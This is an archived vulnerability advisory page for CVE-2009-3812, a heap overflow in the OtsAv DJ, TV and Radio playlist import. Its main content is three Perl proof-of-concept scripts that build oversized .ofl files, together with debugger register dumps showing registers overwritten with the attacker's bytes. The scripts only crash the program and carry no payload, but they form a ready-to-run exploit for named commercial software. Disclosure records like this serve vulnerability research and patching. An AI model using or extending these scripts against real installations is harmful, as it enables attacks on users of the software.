Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
OtsAv DJ [.olf] Local Heap Overflow Poc
2009-10-28 / 2012-01-30
Credit:
Stack
Risk:
High
Local:
Yes
Remote:
No
CVE:
CVE-2009-3812
CWE:
CWE-119
CVSS Base Score:
9.3/10
Impact Subscore:
10/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Complete
Integrity impact:
Complete
Availability impact:
Complete
----------------------------------the first Poc------------------------------------ #!/usr/bin/perl # OtsAv DJ [.olf] Local Heap Overflow Poc # Down : http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetup.exe # Desc : 7000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # register of 7000 A' # EAX 41414141 # ECX 00E5448C OtsAVDJt.00E5448C # EDX 41414141 # EBX 00E54488 OtsAVDJt.00E54488 # ESP 02C6FE1C # EBP 00E0D328 OtsAVDJt.00E0D328 # ESI 00000000 # EDI 0174C070 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA # EIP 0046266C OtsAVDJt.0046266C # register of 2000 A' # EAX 41414141 # ECX 00001B05 # EDX 02FAF730 # EBX 0000042A # ESP 02FAF9C8 # EBP 00000000 # ESI 020FAFEA # EDI 02FAFEAA # EIP 0043C8D7 OtsAVDJt.0043C8D7 use strict; use warnings; my $A= "\x41" x 7000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist; -------------------------------Second Poc----------------------------------------------------- #!/usr/bin/perl # OtsAv TV [.olf] Local Heap Overflow Poc # Down : http://www.otsav.com/buy/tv/ # Desc : 2000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # EAX 45454545 # ECX 00009AF0 # EDX 03A0F730 # EBX 0000042A # ESP 03A0F9C8 # EBP 00000000 # ESI 02CD7102 # EDI 03A0FEAA # EIP 0043C8D7 OtsAVTVt.0043C8D7 use strict; use warnings; my $A= "\x45" x 2000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist; ----------------------------------- 3 POC------------------------------------------------- #!/usr/bin/perl # OtsAv Radio [.olf] Local Heap Overflow Poc # Down : http://www.otsav.com/buy/radio/ # Desc : 2000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # EAX 45454545 # ECX 0000CD32 # EDX 0224F730 # EBX 00000452 # ESP 0224F9C8 # EBP 00000000 # ESI 00C8E0EA # EDI 0224FED2 # EIP 0043B497 OtsAVRDt.0043B497 use strict; use warnings; my $A= "\x45" x 2000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist;
References:
http://xforce.iss.net/xforce/xfdb/51628
http://www.vupen.com/english/advisories/2009/1861
http://www.milw0rm.com/exploits/9113
http://secunia.com/advisories/35738
http://packetstormsecurity.org/0907-exploits/otsav-overflow.txt
http://osvdb.org/55747
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top